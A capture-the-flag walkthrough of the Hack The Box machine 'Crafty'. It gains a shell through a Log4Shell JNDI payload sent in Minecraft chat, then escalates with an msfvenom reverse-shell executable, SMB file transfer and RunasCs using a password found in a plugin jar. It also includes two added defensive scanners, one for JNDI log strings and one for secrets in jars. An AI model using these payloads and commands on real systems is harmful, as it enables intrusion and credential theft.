# Crafty

{% embed url="<https://app.hackthebox.com/machines/Crafty>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Summary

We discovered two open ports: 80 and 25565. Port 80 is running a Microsoft IIS web server hosting a static site called Crafty, while port 25565 is a Minecraft server on version 1.16, which is vulnerable to the Log4Shell RCE vulnerability (CVE-2021-44228). We set up the log4j-shell-poc exploit from GitHub, downloaded JDK 1.8.0\_20 to run it, and used TLauncher to run Minecraft version 1.16.5 and connect to play.crafty.htb. By sending a crafted payload via the Minecraft chat, we gained a reverse shell as the user `svc_minecraft`. On this user's desktop, we found the first flag and, upon further enumeration, discovered a plugin containing a cryptic string that turned out to be the `Administrator` password. Using this password, we executed a reverse shell as `Administrator`, retrieved the root flag, and achieved full system control.

## Recon

We start with an Nmap scan and discover two open ports, 80 and 25565. A subsequent service and default script scan shows that port 80 is running Microsoft IIS hosting a website called Crafty, so we are dealing with a Windows machine. On 25565, we find a Minecraft server in version 1.16. This is a very old version and may be one affected by the RCE vulnerability in Log4j.

<figure><img src="/files/MUcCBFfWm9EPS4QA401t" alt=""><figcaption></figcaption></figure>

The following Gobuster scan of the web server does not reveal any interesting directories.

<figure><img src="/files/xqJFIEBzAJhaZKK321G9" alt=""><figcaption></figcaption></figure>

The site is just static, but it reveals another vhost: play.crafty.htb. Through this, we might be able to connect to the Minecraft server.

<figure><img src="/files/BRNpugPYSIdUioY1CRYF" alt=""><figcaption></figcaption></figure>

We make use of the mcli tool. mcli is a command-line application that provides a front end for the mctools library and supports all operations offered by mctools in a simple, robust manner. With it, we check the connection to the Minecraft server. Both vhosts seem valid.

{% embed url="<https://mctools.readthedocs.io/en/master/mcli.html>" %}

<figure><img src="/files/qZLbkPYa029mjxmL7hzp" alt=""><figcaption></figcaption></figure>

After a short search for version 1.16.5, we are confronted with several PoCs on GitHub for RCE via Log4j (`CVE-2021-44228`).

The Log4j RCE vulnerability, known as Log4Shell, allows attackers to execute arbitrary code on a server by exploiting a flaw in the Log4j library's logging mechanism, where specially crafted log messages can trigger malicious JNDI lookups. This severe flaw impacts many applications and services that use Log4j for logging, posing significant security risks.

This is one of many; we might get a foothold with it.

{% embed url="<https://github.com/Justin-Garey/Minecraft-Log4j-Exploit>" %}

## Foothold

We make use of the following exploit:

{% embed url="<https://github.com/kozmer/log4j-shell-poc>" %}

### Exploit Setup

We test it first. We also need an executable Minecraft client, but we'll take care of that after we get the exploit running. Furthermore, we see that JDK 1.8.0\_20 is missing. This is required by the exploit and must be downloaded separately.

<figure><img src="/files/vx8DqSUNeu1P7uIbGA4y" alt=""><figcaption></figcaption></figure>

There are many ways to do this; the following link lists options for downloading it without an Oracle account.

{% embed url="<https://gist.github.com/wavezhang/ba8425f24a968ec9b2a8619d7c2d86a6?permalink_comment_id=3984992>" %}

At the time the machine was released, the following download path still worked; unfortunately, it no longer does at the time of writing.

```
wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie"  https://download.oracle.com/otn/java/jdk/8u20-b26/jdk-8u20-linux-x64.tar.gz
```

We can either create an account with Oracle - a ten-minute mail will suffice - and download `jdk-8u20` from the official site...

{% embed url="<https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html>" %}

... or we use the following portal, introduced recently:

{% embed url="<https://java-downloader.nadwey.pl/>" %}

After placing the contents of the downloaded JDK into `jdk1.8.0_20`...

<figure><img src="/files/JQWo1N7tBdFieHVMC3iz" alt=""><figcaption></figcaption></figure>

... we are able to launch the PoC successfully.

`--lport`, in this case, is the port on which we expect the connection from our reverse shell.

<figure><img src="/files/ygpdLUYCZh7Z2qtwmflY" alt=""><figcaption></figcaption></figure>

### Minecraft Setup

Since we are dealing with a very old version and we do not have an official Minecraft account, let's make use of TLauncher. Using this Java launcher, we can download the version we need and run it locally without having an account. The versions might differ now. You might also need to start the launcher again after an update.

<figure><img src="/files/3DEe2nvH5qRnTRQRRkm6" alt=""><figcaption></figcaption></figure>

Select `1.16.5`, install the game, and then launch it.

<figure><img src="/files/Lzfi3E1ItamLVIWBhEd2" alt=""><figcaption></figcaption></figure>

Make a direct connection to `play.crafty.htb`. Don't forget to update your `/etc/hosts` file.

<figure><img src="/files/Ph7MJ8AA5WS5qnjZlw1m" alt=""><figcaption></figcaption></figure>

### Exploit

Now you need to update the PoC first. Since we are dealing with a Windows machine and not a Linux one, replace the value `/bin/sh` of the variable `cmd` with `cmd.exe`.

<figure><img src="/files/jsRz4ZDi5EH7b48MM018" alt=""><figcaption></figcaption></figure>

Now run the exploit again.

```
python poc.py --userip 10.10.14.67 --webport 8000 --lport 9001
```

```
--userip 10.10.14.67  # our machine IP
--lport 9001          # our listening port
--webport 8000        # web server port
```

The exploit asks us to send the following payload to trigger it. To do so, we use the in-game chat.

```
${jndi:ldap://10.10.14.67:1389/a}
```

<figure><img src="/files/Ecs3LaFAbNYRMluSElI5" alt=""><figcaption></figcaption></figure>

But first, we run a listener on port 9001.

Next, in the game, press `t` to open the chat. Then paste `${jndi:ldap://<YOUR IP>:1389/a}` and send the payload in the chat.

<figure><img src="/files/jkXvTx8uCp2LWtTAN832" alt=""><figcaption></figcaption></figure>

We receive a connection back as `svc_minecraft`. (The connection to the game times out.)
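The chat message that triggered the shell above is written to the server's log before Log4j ever evaluates it, which is exactly what makes the Log4Shell flaw described in the Recon section detectable after the fact. The following scanner is an added example for this writeup, not code from the page or from the PoC it uses: it walks Minecraft-style log lines, picks out JNDI lookup strings case-insensitively, attributes them to the chatting player, and collects the callback host:port pairs for blocking. The log lines, player names and addresses are constructed, not captured from the box.

```python
"""Scan Minecraft server log lines for Log4Shell-style JNDI lookups.

Added example for this writeup, not code from the page or from the PoC it
uses. Log lines are constructed in the style of a 1.16 server's latest.log;
player names and addresses are made up.
"""
import re

# Constructed sample log (not captured from the Crafty box).
SAMPLE_LOG = """\
[21:14:02] [Server thread/INFO]: steve joined the game
[21:14:09] [Server thread/INFO]: <steve> hello everyone
[21:14:31] [Server thread/INFO]: <steve> ${jndi:ldap://10.10.14.67:1389/a}
[21:14:33] [Server thread/INFO]: <alex> gg
[21:15:01] [Server thread/INFO]: <alex> ${JNDI:LDAP://198.51.100.23:1389/x}
[21:15:40] [Server thread/INFO]: steve left the game
"""

# Chat lines look like "[HH:MM:SS] [thread/LEVEL]: <player> message".
CHAT_RE = re.compile(r"^\[(\d{2}:\d{2}:\d{2})\] \[[^\]]+\]: <([^>]+)> (.*)$")

# A JNDI lookup with one of the schemes Log4j 2.x resolves. Matched
# case-insensitively; host and port are captured so the callback endpoint
# can be blocked or hunted for in network logs.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns)://(?P<host>[^/:\s}]+)(?::(?P<port>\d{1,5}))?",
    re.IGNORECASE,
)


def scan_log(text: str) -> list[dict]:
    """Return one finding per line that carries a JNDI lookup."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = JNDI_RE.search(line)
        if not m:
            continue
        chat = CHAT_RE.match(line)  # None for non-chat lines (join/leave, etc.)
        findings.append({
            "line": lineno,
            "time": chat.group(1) if chat else None,
            "player": chat.group(2) if chat else None,
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": int(m.group("port")) if m.group("port") else None,
            "raw": line,
        })
    return findings


def callback_endpoints(findings: list[dict]) -> list[str]:
    """Distinct host:port pairs the payloads point at, for block lists / IOCs."""
    endpoints = {
        f"{f['host']}:{f['port']}" if f["port"] is not None else f["host"]
        for f in findings
    }
    return sorted(endpoints)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"line {h['line']} {h['time']} player={h['player']} "
              f"{h['scheme']}://{h['host']}:{h['port']}")
    print("callback endpoints:", callback_endpoints(hits))
```

Run against a real `latest.log` (or the rotated `logs/*.log.gz` files) to establish whether the lookup string was ever logged and by which account; the durable fix remains a patched Log4j (2.17.1 or later) or, where the server cannot be upgraded, a logging configuration that disables message lookups.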

<figure><img src="/files/2u986XOzmTDz4uE7tLHX" alt=""><figcaption></figcaption></figure>

On the desktop of the user, we find the first flag.

<figure><img src="/files/kD9I5XRrCjho1Iv7dtSo" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

We check the AV / Defender protection status. Everything is turned off.

```
c:\Users\svc_minecraft\Desktop>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\svc_minecraft\Desktop> Get-MpComputerStatus
Get-MpComputerStatus


AMEngineVersion                  : 0.0.0.0
AMProductVersion                 : 4.18.23100.2009
AMRunningMode                    : Not running
AMServiceEnabled                 : False
AMServiceVersion                 : 0.0.0.0
AntispywareEnabled               : False
AntispywareSignatureAge          : 4294967295
AntispywareSignatureLastUpdated  : 
AntispywareSignatureVersion      : 0.0.0.0
AntivirusEnabled                 : False
AntivirusSignatureAge            : 4294967295
AntivirusSignatureLastUpdated    : 
AntivirusSignatureVersion        : 0.0.0.0
BehaviorMonitorEnabled           : False
ComputerID                       : CE4D07DA-73C9-9868-C9F9-28FB4997F62F
ComputerState                    : 0
DefenderSignaturesOutOfDate      : False
DeviceControlDefaultEnforcement  : N/A
DeviceControlPoliciesLastUpdated : 12/31/1600 4:00:00 PM
DeviceControlState               : N/A
FullScanAge                      : 4294967295
FullScanEndTime                  : 
FullScanOverdue                  : False
FullScanRequired                 : False
FullScanSignatureVersion         : 
FullScanStartTime                : 
IoavProtectionEnabled            : False
IsTamperProtected                : False
IsVirtualMachine                 : True
LastFullScanSource               : 0
LastQuickScanSource              : 0
NISEnabled                       : False
NISEngineVersion                 : 0.0.0.0
NISSignatureAge                  : 4294967295
NISSignatureLastUpdated          : 
NISSignatureVersion              : 0.0.0.0
OnAccessProtectionEnabled        : False
ProductStatus                    : 1
QuickScanAge                     : 4294967295
QuickScanEndTime                 : 
QuickScanOverdue                 : False
QuickScanSignatureVersion        : 
QuickScanStartTime               : 
RealTimeProtectionEnabled        : False
RealTimeScanDirection            : 0
RebootRequired                   : False
SmartAppControlExpiration        : 
SmartAppControlState             : 
TamperProtectionSource           : N/A
TDTMode                          : N/A
TDTSiloType                      : N/A
TDTStatus                        : N/A
TDTTelemetry                     : N/A
TroubleShootingDailyMaxQuota     : 
TroubleShootingDailyQuotaLeft    : 
TroubleShootingEndTime           : 
TroubleShootingExpirationLeft    : 
TroubleShootingMode              : 
TroubleShootingModeSource        : 
TroubleShootingQuotaResetTime    : 
TroubleShootingStartTime         : 
PSComputerName                   : 
```

While enumerating, we found a plugin.

<figure><img src="/files/V70xWvnCasr6peY0n6wK" alt=""><figcaption></figcaption></figure>

To find out more, we need to transfer it to our machine. Previously, we could have used powercat as shown in the following source, which is really interesting:

{% embed url="<https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet>" %}

But this is no longer possible. Another way is to use an SMB server we can set up with impacket. Since the target does not accept SMB connections without a username and password, we simply set them.

```
impacket-smbserver smbFolder $(pwd) -smb2support -username test -password test123
```

<figure><img src="/files/88mPvnEbDEAFQwfBS7ng" alt=""><figcaption></figcaption></figure>

Next, we map the share and copy the plugin to it.

```
net use x: \\10.10.14.67\smbFolder /user:test test123
cp playercounter-1.0-SNAPSHOT.jar x:\
```

<figure><img src="/files/oo58TAa64aRsR7Sj6ru0" alt=""><figcaption></figcaption></figure>

To analyze the Jar, we use the Java Decompiler.

{% embed url="<https://java-decompiler.github.io/>" %}

<figure><img src="/files/wRzU4Y0s2Gfc4iyaGDiz" alt=""><figcaption></figcaption></figure>

Here we find a rather cryptic string, possibly a password. After trying it as the password of the user Administrator with `RunasCs.exe` to execute a command on the system, we confirm that it is indeed the Administrator's password.
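A jar is a zip archive and compiled classes keep their string literals as plain UTF-8 constants, which is why the decompiler above surfaces the password so easily. The scanner below is an added example for this writeup, not code from the page: it opens a jar, pulls printable runs out of each `.class` entry, discards descriptors and prose, and reports literals whose Shannon entropy suggests a credential rather than an identifier. The jar is built in memory from a stand-in class blob (not a loadable class), and the flagged secret is a made-up placeholder, not the box's password.

```python
"""Flag high-entropy string literals in a plugin jar.

Added example for this writeup, not code from the page. The jar below is
constructed in memory; the class bytes only mimic CONSTANT_Utf8 entries and
the secret is a placeholder.
"""
import io
import math
import re
import zipfile

# Printable ASCII runs of at least 12 bytes; shorter literals are rarely secrets.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{12,}")


def shannon_entropy(s: str) -> float:
    """Bits per character; 16 distinct chars in a 16-char string gives 4.0."""
    n = len(s)
    return -sum((s.count(c) / n) * math.log2(s.count(c) / n) for c in set(s))


def looks_like_code(literal: str) -> bool:
    """Skip class/method descriptors and prose, which are not credentials."""
    return "/" in literal or literal.startswith("(") or " " in literal


def suspicious_strings(jar_bytes: bytes, min_entropy: float = 3.8) -> list[tuple[str, str, float]]:
    """Return (entry path, literal, entropy) for high-entropy literals in .class entries."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for info in jar.infolist():
            if not info.filename.endswith(".class"):
                continue
            data = jar.read(info.filename)
            for m in PRINTABLE_RUN.finditer(data):
                literal = m.group().decode("ascii")
                if looks_like_code(literal):
                    continue
                entropy = shannon_entropy(literal)
                if entropy >= min_entropy:
                    findings.append((info.filename, literal, round(entropy, 2)))
    return findings


def make_sample_jar() -> bytes:
    """Constructed jar: class magic plus CONSTANT_Utf8-shaped entries
    (tag 0x01, 2-byte length, bytes). Enough for the scan, not a valid class."""
    def utf8(s: bytes) -> bytes:
        return b"\x01" + len(s).to_bytes(2, "big") + s

    fake_class = (
        b"\xca\xfe\xba\xbe\x00\x00\x00\x34"
        + utf8(b"org/bukkit/plugin/java/JavaPlugin")  # descriptor, skipped
        + utf8(b"onEnable")                           # too short to match
        + utf8(b"rcon.password")                      # low entropy, not flagged
        + utf8(b"Xk7$pQ2!vLm9#zRt")                   # placeholder secret, flagged
        + utf8(b"Player count updated")               # prose, skipped
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("example/PlayerCounter.class", fake_class)
    return buf.getvalue()


if __name__ == "__main__":
    for path, literal, entropy in suspicious_strings(make_sample_jar()):
        print(f"{path}: {literal!r} (entropy {entropy})")
```

Point `suspicious_strings` at the bytes of a real plugin jar to get a quick triage list before reaching for a decompiler; the entropy threshold trades recall for noise, and lowering it pulls in ordinary identifiers like `rcon.password` above.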

<figure><img src="/files/Ll6ewQKHdTZF9X57TdTw" alt=""><figcaption></figcaption></figure>

We prepare a reverse shell exe using msfvenom (Defender and co. are deactivated).

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.67 LPORT=4445 -f exe > rev.exe
```

<figure><img src="/files/8wbyLuE0CSDvaRWWlRXt" alt=""><figcaption></figcaption></figure>

Next, we get the msfvenom reverse shell exe from our share, set up a listener on our desired port, and use `RunasCs.exe` to execute it as an administrator.

<figure><img src="/files/3TDWzzU9HfFgPPiOFpLi" alt=""><figcaption></figcaption></figure>

We get a connection as Administrator and find the root flag on the Administrator's desktop.

<figure><img src="/files/E7kFh7OElsbcGbDPlZpr" alt=""><figcaption></figcaption></figure>

A more boring way would have been to read the flag directly.

```
.\RunasCs.exe Administrator REDACTED "cmd /c dir C:\Users\Administrator\Desktop"
.\RunasCs.exe Administrator REDACTED "cmd /c type C:\Users\Administrator\Desktop\root.txt"
```
